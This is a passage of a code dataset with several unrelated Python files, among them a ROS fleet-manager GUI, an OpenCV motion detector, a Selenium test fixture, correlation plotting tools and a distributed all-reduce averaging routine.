item.setText(2, str(mex_info.job_id) )\n temp_dict[str(mex_info.id)][\"processed\"] = True # Mark MEx as processed.\n break\n else:\n # The job item with it's job id is no longer in the Job Managers jobs lists, thus mark for removal.\n indices_for_removal.append(i)\n\n # [5] Check for unprocessed list items, adding them as new items to the jobs treeWidget\n for mex_key in temp_dict:\n if temp_dict[mex_key][\"processed\"] == False:\n mex_item = QtGui.QTreeWidgetItem( [ \n str(temp_dict[mex_key][\"id\"]), \n str(temp_dict[mex_key][\"status\"]),\n str(temp_dict[mex_key][\"job_id\"]) ] )\n appGui.treeWidgetMEx.addTopLevelItem(mex_item)\n \n # [6] Remove items which were marked for removal\n if len(indices_for_removal) != 0:\n # Sort the indices list in descending order (from highest index to lowest index).\n indices_for_removal.sort(reverse=True)\n # Iterate over the sorted list, removing items from the treeWidgetJobs\n for index in indices_for_removal:\n appGui.treeWidgetMEx.takeTopLevelItem(index)\n\nif __name__ == '__main__':\n try: \n # Initialize the node.\n rospy.init_node('fleet_manager_front')\n\n # Set up information update connections.\n rospy.Subscriber('/mex_sentinel/mex_list_info', MexListInfo, mex_list_info_cb) # Subscription to MEx Sentinel for updating Mobile Executors list.\n rospy.Timer(rospy.Duration(1), job_list_cb) # Timer for updating Jobs list.\n \n #region --- GUI ---\n app = QtGui.QApplication(sys.argv)\n appGui = GuiMainWindow()\n windowIcon = QtGui.QIcon()\n windowIcon.addPixmap(QtGui.QPixmap(\":/icons/Fleet ManagerIcon.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n appGui.setWindowIcon(windowIcon)\n\n # Add orders from example_orders.JSON\n filename = \"example_orders.JSON\"\n if not os.path.isfile(filename):\n # File does not exist yet (first time usage). Create it first from dictionary.\n order_data = {\n \"0\" : {\n \"keyword\" : \"MOVE\",\n \"priority\" : \"LOW\",\n \"order_args\" : [\"loc03\"]\n },\n \"1\" : {\n \"keyword\" : \"MOVE\",\n \"priority\" : \"MEDIUM\",\n \"order_args\" : [\"loc02\"]\n },\n \"2\" : {\n \"keyword\" : \"TRANSPORT\",\n \"priority\" : \"LOW\",\n \"order_args\" : [\"loc01\", \"loc02\"]\n },\n \"3\" : {\n \"keyword\" : \"LOAD\",\n \"priority\" : \"MEDIUM\",\n \"order_args\" : []\n },\n \"4\" : {\n \"keyword\" : \"UNLOAD\",\n \"priority\" : \"HIGH\",\n \"order_args\" : []\n },\n \"5\" : {\n \"keyword\" : \"TRANSPORT\",\n \"priority\" : \"CRITICAL\",\n \"order_args\" : [\"loc04\", \"loc01\"]\n }\n }\n with open(filename, 'w') as outfile:\n json.dump(order_data, outfile, indent=4)\n pass\n load_orders_from_JSON(filename)\n\n appGui.show()\n app.exec_()\n #endregion\n except rospy.ROSInterruptException:\n pass","sub_path":"src/fleet_manager_front.py","file_name":"fleet_manager_front.py","file_ext":"py","file_size_in_byte":22599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"383090960","text":"\"\"\" --- Directions\nCheck to see if two provided strings are anagrams of eachother.\nOne string is an anagram of another if it uses the same characters\nin the same quantity. Only consider characters, not spaces\nor punctuation. Consider capital letters to be the same as lower case\n--- Examples\n anagrams('rail safety', 'fairy tales') --> True\n anagrams('RAIL! SAFETY!', 'fairy tales') --> True\n anagrams('Hi there', 'Bye there') --> False \"\"\"\nfrom re import sub\n\ndef anagrams(stringA, stringB):\n charMapA = create_char_map(stringA)\n charMapB = create_char_map(stringB)\n\n return charMapA == charMapB\n\ndef create_char_map(string):\n string = ''.join(e for e in string if e.isalpha()).lower()\n d = {}\n for char in string:\n if char in d:\n d[char] += 1\n else:\n d[char] = 1\n return d","sub_path":"anagrams/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"397200770","text":"import cv2 as cv\nimport numpy as np\n\ncap = cv.VideoCapture('vtest.avi')\n\nret, frame1 = cap.read()\nret, frame2 = cap.read()\n\nwhile cap.isOpened() :\n diff = cv.absdiff(frame1, frame2)\n\n gray = cv.cvtColor(diff, cv.COLOR_BGR2GRAY)\n blur = cv.GaussianBlur(gray, (5, 5), 0 )\n __, thresh = cv.threshold(blur, 20, 255, cv.THRESH_BINARY)\n dilated = cv.dilate(thresh, None, iterations=3)\n\n contours, __ = cv.findContours(dilated, cv.RETR_TREE, cv.CHAIN_APPROX_NONE)\n\n #cv.drawContours(frame1, contours, -1, (0, 0, 255), 2, cv.LINE_AA)\n \n \n for contour in contours :\n (x, y, width, height) = cv.boundingRect(contour)\n \n if cv.contourArea(contour) < 700 :\n continue\n \n cv.rectangle(frame1, (x, y), (x+width, y+height), (0, 255, 0), 2, cv.LINE_AA)\n cv.putText(frame1, \"Status : {}\".format('Motion Detected'), (30, 30), cv.FONT_HERSHEY_SIMPLEX,\n 1, (0, 0, 255), 3)\n\n cv.imshow('motion_detection', frame1)\n\n frame1 = frame2\n ret, frame2 = cap.read()\n\n key = cv.waitKey(40) & 0xFF\n if key == ord('q') :\n break\n\ncap.release()\ncv.destroyAllWindows()","sub_path":"45_basic_motion_detection_2.py","file_name":"45_basic_motion_detection_2.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"187539638","text":"from selenium import webdriver\nimport pytest\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom webdriver_manager.firefox import GeckoDriverManager\n\n\n@pytest.fixture()\ndef setup(browser):\n if browser == 'chrome':\n # driver = webdriver.Chrome(ChromeDriverManager().install())\n driver = webdriver.Chrome(executable_path=\"/Users/fdomfeh/Downloads/chromedriver\")\n print(\"Launching Chrome browser......\")\n elif browser == \"firefox\":\n # driver = webdriver.Firefox(executable_path=GeckoDriverManager().install())\n driver = webdriver.Firefox(executable_path=\"/Users/fdomfeh/WorkSpace/hosted-payment-page-tests/drivers/geckodriver\")\n print(\"Launching Firefox browser.......\")\n elif browser == 'Opera':\n driver = webdriver.Opera()\n print(\"Launching Opera browser.......\")\n else:\n driver = webdriver.Safari()\n print(\"Launching Safari browser......\")\n return driver\n\n\n# This will get the value from CLI /hooks\ndef pytest_addoption(parser):\n parser.addoption(\"--browser\")\n\n# This will return the Browser value to setup method\n@pytest.fixture()\ndef browser(request):\n return request.config.getoption(\"--browser\")\n\n############### Generate PyTest HTML Report ################\n# It is hooks for Adding Environment info to HTML Report\n# To access the metadata from a plugin, you can use the _metadata attribute of the config object\n# This can be used to read/add/modify the metadata:\n\ndef pytest_configure(config):\n if hasattr(config, '_metadata'):\n config._metadata['Project Name'] = 'nop commerce'\n config._metadata['Module Name'] = 'Customer'\n config._metadata['Tester'] = 'Frankie'\n\n# It is hook for delete/Modify Environment info to HTML Report\n@pytest.mark.optionalhook\ndef pytest_metadata(metadata):\n metadata.pop(\"JAVA_HOME\", None)\n metadata.pop(\"Plugins\", None)\n","sub_path":"testCases/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"274311281","text":"def entry_exit(f):\n def new_f():\n t = input('something: ')\n print(t)\n print(\"Entering\", f.__name__)\n f()\n print(\"Exited\", f.__name__)\n return new_f\n\n@entry_exit\ndef func1():\n print(\"inside func1()\")\n\n#func1()\n\nimport toolkit\nimport validators\n\n\ndef ping_handler(f):\n #def wrapper():\n hostname = input('Hostname > ')\n echos = input('Enter number of echo requests [25] > ')\n if echos == '':\n echos = '25'\n return f(hostname, echos)\n #return wrapper\n\n\n@ping_handler\ndef get_ping(node, count='25'):\n try:\n print(toolkit.check_ping(node, count=count))\n except AttributeError:\n print('Unable to ping {}; check its syntax'.format(node))\n\n\nget_ping()","sub_path":"p3_essentials/Decorators/decorator7.py","file_name":"decorator7.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"510599703","text":"\nfrom storyready import Story, has_gwt, has_asa, has_rightsize, nosize, has_description, rank\nimport unittest\n\n\nclass TestStoryReady(unittest.TestCase):\n\n def test_two_stories_one_without_gwts(self):\n stories = [Story(1,\"a story with no gwts\",0),\n Story(2,\"Given this When that Then the other etc.\",0)]\n\n no_gwts = has_gwt(stories)\n self.assertEqual(1, len(no_gwts))\n\n def test_two_stories_one_without_asa(self):\n stories = [Story(1,\"a story with no Story format\",0),\n Story(2,\"As a frog I Want a pond So That I can swim\",0)]\n\n no_asas = has_asa(stories)\n self.assertEqual(1, len(no_asas))\n\n def test_three_stories_with_two_without_size(self):\n stories = [Story(1,description=\"story one\"),\n Story(2,description=\"story two\"),\n Story(3,size=100)]\n\n not_sized = nosize(stories)\n self.assertEqual(2,len(not_sized))\n\n def test_three_stories_with_two_no_description(self):\n stories = [Story(1,size=30),\n Story(2,size=10),\n Story(3,description=\"story one\")]\n\n no_description = has_description(stories)\n self.assertEqual(2,len(no_description))\n\n def test_three_stories_with_two_wrong_size(self):\n stories = [Story(1,size=30),\n Story(2,size=10),\n Story(3,size=100)]\n\n not_rightsized = has_rightsize(stories,200,0.3)\n self.assertEqual(1,len(not_rightsized))\n\n def test_rank(self):\n stories = [Story(1,description=\"As a I want So that ... Given this When that Then other \",size=10),\n Story(2,description=\"rubbish description\", size=10),\n Story(3,size=100)]\n\n ranked = rank(stories, 200, 0.3)\n print(ranked)\n self.assertEqual(4,ranked[3]) # story 3 fails on everything except empty size\n self.assertEqual(2,ranked[2]) # story 2 fails on GWT and Story format\n self.assertEqual(False,1 in ranked) # story one is perfect\n","sub_path":"test/test_storyready.py","file_name":"test_storyready.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"336710734","text":"__author__ = 'htelg'\n\nimport numpy as _np\nfrom scipy import stats as _stats\nimport matplotlib.pylab as _plt\nfrom atmPy.tools import plt_tools as _plt_tools\n\ndef find_closest(array, value, how = 'closest'):\n \"\"\"Finds the element of an array which is the closest to a given number and returns its index\n\n Arguments\n ---------\n array: array\n The array to search thru.\n value: float or array-like.\n Number (list of numbers) to search for.\n how: string\n 'closest': look for the closest value\n 'closest_low': look for the closest value that is smaller than value\n 'closest_high': look for the closest value that is larger than value\n\n Return\n ------\n integer or array\n position of closest value(s)\"\"\"\n\n if _np.any(_np.isnan(array)) or _np.any(_np.isnan(value)):\n txt = '''Array or value contains nan values; that will not work'''\n raise ValueError(txt)\n\n if type(value).__name__ in ('float', 'int', 'float64', 'int64'):\n single = True\n value = _np.array([value], dtype=float)\n\n elif type(value).__name__ in ('list', 'ndarray'):\n single = False\n pass\n\n else:\n raise ValueError('float,int,array or list are ok types for value. You provided %s' % (type(value).__name__))\n\n out = _np.zeros((len(value)), dtype=int)\n for e, i in enumerate(value):\n nar = array - i\n if how == 'closest':\n pass\n elif how == 'closest_low':\n nar[nar > 0] = array.max()\n elif how == 'closest_high':\n nar[nar < 0] = array.max()\n else:\n txt = 'The keyword argument how has to be one of the following: \"closest\", \"closest_low\", \"closest_high\"'\n raise ValueError(txt)\n out[e] = _np.abs(nar).argmin()\n if single:\n out = out[0]\n return out\n\n\ndef reverse_binary(variable, no_bits):\n \"\"\"This converts all numbers into binary of length no_bits. Then it reverses the\n binaries and finally converts it into integer again.\n This is usefull for quality flags that are often represented in integers of\n which each position of the corresponding binary tells you something about a\n different qualty criteria. Sometimes bad values are at the beginning sometimes\n at the end and reversing is desired.\n\n Parameters\n ==========\n variable: ndarray or pandas object\n\n Returns\n =======\n what ever you put in\n\n Examples\n ========\n >>> a = np.array([1,0,0,2,0,8])\n >>> array_tools.reverse_binary(a,4)\n array([8, 0, 0, 4, 0, 1])\n \"\"\"\n variable = variable.copy()\n rep = '{0:0%sb}'%no_bits\n func = _np.vectorize(lambda i: int(rep.format(i)[::-1],2))\n variable[:] = func(variable)\n return variable\n\n\nclass Correlation(object):\n def __init__(self, data, correlant, remove_zeros = True, index = False):\n \"\"\"This object is for testing correlation in two two data sets.\n\n Parameters\n ----------\n data and correlant: 1D arry\n These are the two data set which are compared\n remove_zeros: bool\n If zeros ought to be deleted. Datasets often contain zeros that are the\n result of invalid data. If there is the danger that this introduces a\n bias set it to False\"\"\"\n\n data = data.copy()\n correlant = correlant.copy()\n self.__pearson_r = None\n self.__linear_regression = None\n self.__linear_regression_function = None\n self.__linear_regression_zero = None\n self.__linear_regression_zero_function= None\n\n if remove_zeros:\n correlant = correlant[data != 0]\n if type(index) != bool:\n index = index[data != 0]\n data = data[data != 0]\n\n data = data[correlant != 0]\n if type(index) != bool:\n index = index[correlant != 0]\n correlant = correlant[correlant != 0]\n\n # nans have to be removed\n correlant = correlant[~ _np.isnan(data)]\n if type(index) != bool:\n index = index[~ _np.isnan(data)]\n data = data[~ _np.isnan(data)]\n\n data = data[~ _np.isnan(correlant)]\n if type(index) != bool:\n index = index[~ _np.isnan(correlant)]\n correlant = correlant[~ _np.isnan(correlant)]\n\n self._data = data\n self._correlant = correlant\n self._index = index\n self._x_label_correlation = 'Data'\n self._y_label_correlation = 'Correlant'\n self._x_label_orig = 'Item'\n self._y_label_orig_data = 'Data'\n self._y_label_orig_correlant = 'Correlant'\n\n @property\n def pearson_r(self):\n if not self.__pearson_r:\n self.__pearson_r = _stats.pearsonr(self._data, self._correlant)\n return self.__pearson_r\n\n @property\n def linear_regression(self):\n if not self.__linear_regression:\n self.__linear_regression = _stats.linregress(self._data, self._correlant)\n return self.__linear_regression\n\n @property\n def linear_regression_zero_intersect(self):\n if not self.__linear_regression_zero:\n x = self._data\n x = x[:, _np.newaxis]\n self.__linear_regression_zero = _np.linalg.lstsq(x, self._correlant)\n return self.__linear_regression_zero\n\n @property\n def linear_regression_function(self):\n if not self.__linear_regression_function:\n self.__linear_regression_function = lambda x: x * self.linear_regression.slope + self.linear_regression.intercept\n return self.__linear_regression_function\n\n @property\n def linear_regression_zero_intersect_function(self):\n if not self.__linear_regression_zero_function:\n self.__linear_regression_zero_function = lambda x: x * self.linear_regression_zero_intersect[0]\n return self.__linear_regression_zero_function\n\n # todo: allow xlim and ylim to be tuples so you can devine a limit range rather then just the upper limit\n def plot_pearson(self, zero_intersect = False, gridsize = 100, cm = 'auto', xlim = None,\n ylim = None, p_value = True, colorbar = False, ax = None, text_pos = (0.1,0.9), **kwargs):\n \"\"\"\n\n Parameters\n ----------\n gridsize:\n cm: matplotlib.color map\n xlim: int or float\n upper limit of x. Similar to set_xlim(right = ...) in addition it\n adjusts the gridsize so hexagons are not getting streched\n ylim: int or float\n as xlim just for y-axis\n p_value: bool\n if the p-value is given in the text box\n colorbar: bool\n ax: bool or matplotlib.Axes instance\n If desired to plot on another axes.\n kwargs\n\n Returns\n -------\n\n \"\"\"\n if not ax:\n f,a = _plt.subplots()\n else:\n f = ax.get_figure()\n a = ax\n\n ratio = 14/20 #at this ratio hexagons look symmetric at the particular setting\n\n a.set_xlabel(self._x_label_correlation)\n a.set_ylabel(self._y_label_correlation)\n\n if cm == 'auto':\n cm = _plt.cm.copper_r\n\n cm.set_under('w')\n\n if xlim:\n if type(xlim).__name__ in ['int', 'float']:\n xratio = self._data.max() / xlim\n gridsize_x = int(gridsize * xratio)\n else:\n gridsize_x = gridsize\n\n if ylim:\n yratio = self._correlant.max() / ylim\n gridsize_y = int(ratio * gridsize * yratio)\n else:\n gridsize_y = int(gridsize * ratio)\n\n gridsize_new = (gridsize_x, gridsize_y)\n\n # import pdb\n # pdb.set_trace()\n hb = a.hexbin(self._data, self._correlant, gridsize=gridsize_new, cmap=cm, vmin = 0.001, **kwargs)\n\n if xlim:\n a.set_xlim(right=xlim)\n if ylim:\n a.set_ylim(top=ylim)\n\n if colorbar:\n f.colorbar(hb, ax = a)\n# linreg_func = lambda x: x * linreg.slope + linreg.intercept\n # data.min()\n\n x_reg_func = _np.array([self._data.min(), self._data.max()])\n\n if zero_intersect:\n y_reg_func = self.linear_regression_zero_intersect_function(x_reg_func)\n slope = self.linear_regression_zero_intersect[0]\n intersect = 0\n std = (self._correlant - self.linear_regression_zero_intersect_function(self._data)).std()\n else:\n y_reg_func = self.linear_regression_function(x_reg_func)\n slope = self.linear_regression.slope\n intersect = self.linear_regression.intercept\n # std = self.linear_regression.stderr\n std = (self._correlant - self.linear_regression_function(self._data)).std()\n\n color = _plt_tools.color_cycle[2]\n a.plot(x_reg_func, y_reg_func, lw = 2, color = color)\n\n\n txt = '$r = %0.2f$'%(self.pearson_r[0])\n txt += '\\n$r^2 = %0.2f$' % ((self.pearson_r[0])**2)\n # if p_value:\n txt += '\\n$p = %0.2f$'%(self.pearson_r[1])\n txt += '\\n$m = %0.2f$'%(slope)\n txt += '\\n$c = %0.2f$'%(intersect)\n txt += '\\n$std = %0.2f$'%(std)\n\n props = dict(boxstyle='round', facecolor='white', alpha=0.5)\n\n a.text(text_pos[0],text_pos[1], txt, transform=a.transAxes, horizontalalignment='left', verticalalignment='top', bbox = props)\n return a\n\n def plot_original_data(self, ax = None, **kwargs):\n if not ax:\n f,a = _plt.subplots()\n else:\n f = ax.get_figure()\n a = ax\n\n a.set_xlabel(self._x_label_orig)\n\n if type(self._index) != bool:\n a.plot(self._index, self._data, linewidth = 2, color = _plt_tools.color_cycle[0], **kwargs)\n else:\n a.plot(self._data, linewidth = 2, color = _plt_tools.color_cycle[0], **kwargs)\n\n g = a.get_lines()[-1]\n g.set_marker('.')\n\n a.set_ylabel(self._y_label_orig_data)\n\n a.tick_params(axis = 'y', left = True, color = _plt_tools.color_cycle[0], zorder = 99)\n a.spines['left'].set_color(_plt_tools.color_cycle[0])\n a.spines['left'].set_zorder(99)\n\n a2 = a.twinx()\n if type(self._index) != bool:\n a2.plot(self._index,self._correlant, linewidth = 2, color = _plt_tools.color_cycle[1], **kwargs)\n else:\n a2.plot(self._correlant, linewidth = 2, color = _plt_tools.color_cycle[1])\n\n g = a2.get_lines()[-1]\n g.set_marker('.')\n\n a2.set_ylabel(self._y_label_orig_correlant)\n\n a2.tick_params(axis = 'y', right = True, color = _plt_tools.color_cycle[1])\n a2.spines['right'].set_color(_plt_tools.color_cycle[1])\n a2.spines['left'].set_visible(False)\n\n\n if type(self._index).__name__ == 'DatetimeIndex':\n # f.autofmt_xdate()\n _plt.setp(a.xaxis.get_majorticklabels(), rotation=30 )\n return a, a2\n\n def plot_pearsonANDoriginal_data(self, gridsize = 20, zero_intersect = False, xlim = None, ylim = None, cm = 'auto', p_value = True, width_ratio = [1.5, 2], corr_kwargs = {}, orig_kwargs = {}):\n f, (a_corr, a_orig) = _plt.subplots(1,2, gridspec_kw = {'width_ratios':width_ratio})\n f.set_figwidth(f.get_figwidth()*1.7)\n a1 = self.plot_pearson(zero_intersect = zero_intersect, gridsize=gridsize, cm = cm, xlim = xlim, ylim = ylim, p_value=p_value, ax = a_corr, **corr_kwargs)\n a2,a3 = self.plot_original_data(ax = a_orig, **orig_kwargs)\n return a1, a2, a3\n","sub_path":"atmPy/tools/array_tools.py","file_name":"array_tools.py","file_ext":"py","file_size_in_byte":11499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"181689806","text":"import asyncio\nfrom typing import Sequence, Set, Dict, Tuple, Iterable, AsyncIterator, Any\n\nimport grpc\nimport torch\n\nfrom hivemind.utils import Endpoint, get_logger, ChannelCache, anext\nfrom hivemind.utils import serialize_torch_tensor, deserialize_torch_tensor, split_for_streaming, combine_from_streaming\nfrom hivemind.proto import averaging_pb2_grpc, runtime_pb2, averaging_pb2\n\n# flavour types\nGroupID = bytes\nlogger = get_logger(__name__)\n\n\nclass AllReduceProtocol:\n \"\"\"\n An internal class that runs butterfly AllReduce in a predefined group of averagers\n\n :param tensors: local tensors that should be averaged with groupmates\n :param endpoint: your endpoint, must be included in ordered_group_endpoints\n :param ordered_group_endpoints: group endpoints ordered s.t. i-th endpoint is responsible for averaging i-th part\n :param part_sizes: for each peer, a number of vector elements that this peer is responsible for averaging\n :param return_deltas: if True, returns the element-wise differences (averaged_tensors - original_tensors)\n default (False) - return averaged_tensors by themselves\n \"\"\"\n\n def __init__(self, *, group_id: GroupID, tensors: Sequence[torch.Tensor], endpoint: Endpoint,\n ordered_group_endpoints: Sequence[Endpoint], part_sizes: Tuple[int, ...], return_deltas: bool = False):\n assert endpoint in ordered_group_endpoints, \"endpoint is not a part of the group\"\n self.group_id, self.endpoint = group_id, endpoint\n self.ordered_group_endpoints, self.part_sizes = ordered_group_endpoints, part_sizes\n self.local_tensor_parts = dict(zip(ordered_group_endpoints, split_into_parts(tensors, part_sizes)))\n self.tensor_shapes = tuple(tensor.shape for tensor in tensors)\n self.return_deltas = return_deltas\n\n self.accumulator = self.local_tensor_parts[self.endpoint].clone() # sum inputs from peers to this tensor\n self.accumulated_from: Set[Endpoint] = {self.endpoint} # peers that we have accumulated our part from\n self.averaged_part: asyncio.Future[torch.Tensor] = asyncio.Future() # will be set to [accumulator / group size]\n self.averaged_tensor_parts: Dict[Endpoint, torch.Tensor] = {} # averaged chunks from all peers will be put here\n self.future: asyncio.Future[Sequence[torch.Tensor]] = asyncio.Future() # final result or exception\n\n def __repr__(self):\n return f\"{self.__class__.__name__}({self.endpoint}, group_size={self.group_size})\"\n\n def __await__(self):\n return self.future.__await__()\n\n def __contains__(self, endpoint: Endpoint):\n return endpoint in self.local_tensor_parts\n\n @property\n def group_size(self):\n return len(self.ordered_group_endpoints)\n\n async def accumulate_part(self, source: Endpoint, remote_part: torch.Tensor) -> torch.Tensor:\n \"\"\" Add vector part to accumulator, wait for all other vectors to be added, then return the average part \"\"\"\n assert not self.averaged_part.done(), f\"already finished averaging part: {self.averaged_part}\"\n assert not self.future.done(), f\"already finished allreduce: {self.future}\"\n assert source in self.local_tensor_parts, \"unexpected source, not a part of current group\"\n assert source not in self.accumulated_from, \"duplicate source, already received that part\"\n logger.debug(f\"{self} - accumulating tensor part from {source}\")\n\n self.accumulator.add_(remote_part)\n self.accumulated_from.add(source)\n\n assert len(self.accumulated_from) <= self.group_size\n if len(self.accumulated_from) == len(self.local_tensor_parts):\n average_result = self.accumulator.div_(len(self.accumulated_from))\n self.register_averaged_part(self.endpoint, average_result)\n self.averaged_part.set_result(average_result)\n\n return await self.averaged_part\n\n def register_averaged_part(self, source: Endpoint, averaged_part: torch.Tensor):\n assert not self.future.done(), f\"already finished allreduce: {self.future}\"\n assert source in self.local_tensor_parts, \"the provider of averaged part is not from my group\"\n assert source not in self.averaged_tensor_parts, \"already registered the average from this peer\"\n assert averaged_part.shape == self.local_tensor_parts[source].shape, \"averaged part shape mismatch\"\n assert averaged_part.dtype == self.local_tensor_parts[source].dtype, \"averaged part dtype mismatch\"\n logger.debug(f\"{self} - receiving averaged tensor part from {source}\")\n self.averaged_tensor_parts[source] = averaged_part\n if len(self.averaged_tensor_parts) == len(self.local_tensor_parts):\n ordered_averaged_parts = [self.averaged_tensor_parts[endpoint] for endpoint in self.ordered_group_endpoints]\n outputs = restore_from_parts(ordered_averaged_parts, self.tensor_shapes)\n\n if self.return_deltas:\n local_parts = [self.local_tensor_parts[peer] for peer in self.ordered_group_endpoints]\n with torch.no_grad():\n original_tensors = restore_from_parts(local_parts, self.tensor_shapes)\n for averaged_tensor, original_tensor in zip(outputs, original_tensors):\n averaged_tensor -= original_tensor\n\n self.future.set_result(outputs)\n\n def cancel(self) -> bool:\n if not self.future.done():\n logger.debug(f\"{self} - cancelled\")\n self.future.cancel()\n if not self.averaged_part.done():\n self.averaged_part.cancel()\n return True\n else:\n logger.debug(f\"{self} - failed to cancel, allreduce is already finished: {self.future}\")\n return False\n\n def set_exception(self, exception: Exception) -> bool:\n if not self.future.done():\n logger.debug(f\"{self} - {exception}\")\n self.future.set_exception(exception)\n if not self.averaged_part.done():\n self.averaged_part.cancel()\n return True\n else:\n logger.debug(f\"{self} - failed to set {exception}, allreduce already finished: {self.future}\")\n return False\n\n\nclass AllReduceRunner(AllReduceProtocol, averaging_pb2_grpc.DecentralizedAveragingServicer):\n \"\"\"\n A class that implements ButterflyAllReduceProtocol on top of a gRPC servicer\n \"\"\"\n\n def __init__(self, *, group_id: GroupID, tensors: Sequence[torch.Tensor], endpoint: Endpoint,\n ordered_group_endpoints: Sequence[Endpoint], compression_type: runtime_pb2.CompressionType,\n chunk_size_bytes: int, part_sizes: Tuple[int, ...], group_key_seed: int, gathered: Sequence[Any] = (),\n return_deltas: bool = False):\n super().__init__(group_id=group_id, tensors=tensors, endpoint=endpoint, part_sizes=part_sizes,\n ordered_group_endpoints=ordered_group_endpoints, return_deltas=return_deltas)\n self.compression_type, self.chunk_size_bytes, self.gathered = compression_type, chunk_size_bytes, gathered\n self.averaged_part_stream: asyncio.Future[Tuple[runtime_pb2.Tensor, ...]] = asyncio.Future()\n self.group_key_seed = group_key_seed\n\n def _get_peer_stub(self, peer: Endpoint) -> averaging_pb2_grpc.DecentralizedAveragingStub:\n return ChannelCache.get_stub(peer, averaging_pb2_grpc.DecentralizedAveragingStub, aio=True)\n\n async def _communicate_with_peer(self, peer_endpoint: Endpoint, local_part: torch.Tensor) -> torch.Tensor:\n \"\"\" Send a part of local tensors and metadata to a single peer, receive the average for that part of tensors \"\"\"\n serialized_tensor_part = serialize_torch_tensor(local_part, self.compression_type, allow_inplace=False)\n chunks = split_for_streaming(serialized_tensor_part, self.chunk_size_bytes)\n\n stream = self._get_peer_stub(peer_endpoint).rpc_aggregate_part()\n await stream.write(averaging_pb2.AveragingData(code=averaging_pb2.PART_FOR_AVERAGING, group_id=self.group_id,\n endpoint=self.endpoint, tensor_part=next(chunks)))\n for chunk in chunks:\n await stream.write(averaging_pb2.AveragingData(tensor_part=chunk))\n await stream.done_writing()\n\n outputs: Sequence[averaging_pb2.AveragingData] = [message async for message in stream]\n code = outputs[0].code if outputs else averaging_pb2.INTERNAL_ERROR\n if code != averaging_pb2.AVERAGED_PART:\n raise AllreduceException(f\"peer {peer_endpoint} returned {averaging_pb2.MessageCode.Name(code)}\"\n f\" instead of {averaging_pb2.MessageCode.Name(averaging_pb2.AVERAGED_PART)},\"\n f\" allreduce failed\")\n\n averaged_part = deserialize_torch_tensor(combine_from_streaming([message.tensor_part for message in outputs]))\n self.register_averaged_part(peer_endpoint, averaged_part)\n return averaged_part\n\n async def _send_error_to_peer(self, peer_endpoint: Endpoint, code: averaging_pb2.MessageCode):\n stream = self._get_peer_stub(peer_endpoint).rpc_aggregate_part()\n await stream.write(averaging_pb2.AveragingData(group_id=self.group_id, endpoint=self.endpoint, code=code))\n await stream.done_writing()\n\n async def run(self) -> Sequence[torch.Tensor]:\n \"\"\"\n send allreduce requests to all peers and collect results, return the averaged tensor (or deltas)\n \"\"\"\n try:\n await asyncio.gather(self, *(self._communicate_with_peer(peer, part)\n for peer, part in self.local_tensor_parts.items() if peer != self.endpoint))\n return await self\n except BaseException as e:\n code = averaging_pb2.CANCELLED if isinstance(e, asyncio.CancelledError) else averaging_pb2.INTERNAL_ERROR\n logger.debug(f\"{self} - notifying peers about {averaging_pb2.MessageCode.Name(code)}\")\n self.set_exception(e)\n for peer_endpoint in self.ordered_group_endpoints:\n if peer_endpoint != self.endpoint:\n asyncio.create_task(self._send_error_to_peer(peer_endpoint, code))\n raise\n\n async def accumulate_part_streaming(self, source: Endpoint, stream_messages: Iterable[runtime_pb2.Tensor]\n ) -> Iterable[runtime_pb2.Tensor]:\n \"\"\" accumulate_part using streams of serialized tensors. Used to prevent duplicate work in serialization \"\"\"\n tensor_part: torch.Tensor = deserialize_torch_tensor(combine_from_streaming(stream_messages))\n averaged_part = await self.accumulate_part(source, tensor_part)\n if not self.averaged_part_stream.done():\n serialized_tensor = serialize_torch_tensor(averaged_part, self.compression_type, allow_inplace=False)\n stream_chunks = tuple(split_for_streaming(serialized_tensor, self.chunk_size_bytes))\n self.averaged_part_stream.set_result(stream_chunks)\n return stream_chunks\n else:\n return self.averaged_part_stream.result()\n\n async def rpc_aggregate_part(self, stream: AsyncIterator[averaging_pb2.AveragingData], context: grpc.ServicerContext\n ) -> AsyncIterator[averaging_pb2.AveragingData]:\n \"\"\" a groupmate sends us a part of his tensor; we should average it with other peers and return the result \"\"\"\n request: averaging_pb2.AveragingData = await anext(stream)\n\n if request.group_id != self.group_id:\n yield averaging_pb2.AveragingData(code=averaging_pb2.BAD_GROUP_ID)\n\n elif request.code == averaging_pb2.PART_FOR_AVERAGING:\n try:\n tensor_chunks = (request.tensor_part, *[msg.tensor_part async for msg in stream])\n averaged_chunks = iter(await self.accumulate_part_streaming(request.endpoint, tensor_chunks))\n yield averaging_pb2.AveragingData(code=averaging_pb2.AVERAGED_PART, tensor_part=next(averaged_chunks))\n for averaged_chunk in averaged_chunks:\n yield averaging_pb2.AveragingData(tensor_part=averaged_chunk)\n\n except Exception as e:\n self.set_exception(e)\n yield averaging_pb2.AveragingData(code=averaging_pb2.INTERNAL_ERROR)\n else:\n error_code = averaging_pb2.MessageCode.Name(request.code)\n logger.debug(f\"{self} - peer {request.endpoint} sent {error_code}, allreduce cannot continue\")\n self.set_exception(AllreduceException(f\"peer {request.endpoint} sent {error_code}.\"))\n yield averaging_pb2.AveragingData(code=averaging_pb2.INTERNAL_ERROR)\n\n\ndef split_into_parts(tensors: Sequence[torch.Tensor], part_sizes: Tuple[int]) -> Tuple[torch.Tensor, ...]:\n \"\"\" combines averaged_tensors into one tensor and splits them into equal chunks of size group_size \"\"\"\n flat_tensor = torch.cat(tuple(map(torch.Tensor.flatten, tensors)))\n return torch.split_with_sizes(flat_tensor, part_sizes, dim=0)\n\n\ndef restore_from_parts(chunks: Sequence[torch.Tensor], shapes: 